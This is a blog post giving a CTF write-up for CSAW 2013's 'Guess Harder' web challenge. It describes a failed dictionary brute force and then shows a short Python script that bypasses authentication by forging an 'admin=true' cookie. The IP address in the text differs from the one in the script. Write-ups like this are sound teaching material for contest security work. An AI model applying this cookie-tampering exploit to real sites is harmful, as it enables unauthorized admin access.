VnutZ Domain
Copyright © 1996 - 2024 [Matthew Vea] - All Rights Reserved

2013-09-22
Featured Article

CSAW CTF 2013 - WEB 100 "Guess Harder"

[index] [2,006 page views]
Tagged As: CTF, Contest, Hacking, and Programming

So there's no way for anybody to play around with WEB100 "Guess Harder" after the fact since the challenge web server is shut down. The challenge provided an IP address - http://128.238.66.215 - which showed a short message to the effect of "HA! Bet you can't guess my password.", included a text box, and a submit button. When you guess wrong, the page just recycles.

Admittedly, I did this one the hard way at first by scripting a brute force routine with Python that cycled through all the entries of password dictionary. That thing ran for a long time and produced nothing so I finally opened up WireShark to take a peak. Lo and behold, within the HTTP header was a field COOKIE: admin=false. Could it be that easy?

 
import httplib, urllib
params = urllib.urlencode({'password' : 'password'})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain", "Cookie": "admin=true\r\n"}
conn = httplib.HTTPConnection("128.238.66.225:80")
conn.request("POST", "/", params, headers)
response = conn.getresponse()
print response.status, response.reason, response.read()
conn.close()

Yup. Just telling the server admin=true in the cookie field made it accept the entry and it provided the necessary flag.



More site content that might interest you:

Viewing the "sandal thrower" as success is not obvious - until you consider this never would have happened under the prior regime.


Try your hand at fate and use the site's continuously updating statistical analysis of the MegaMillions and PowerBall lotteries to choose "smarter" number. Remember, you don't have to win the jackpot to win money from the lottery!


Tired of social media sites mining all your data? Try a private, auto-deleting message bulletin board.


paypal coinbase marcus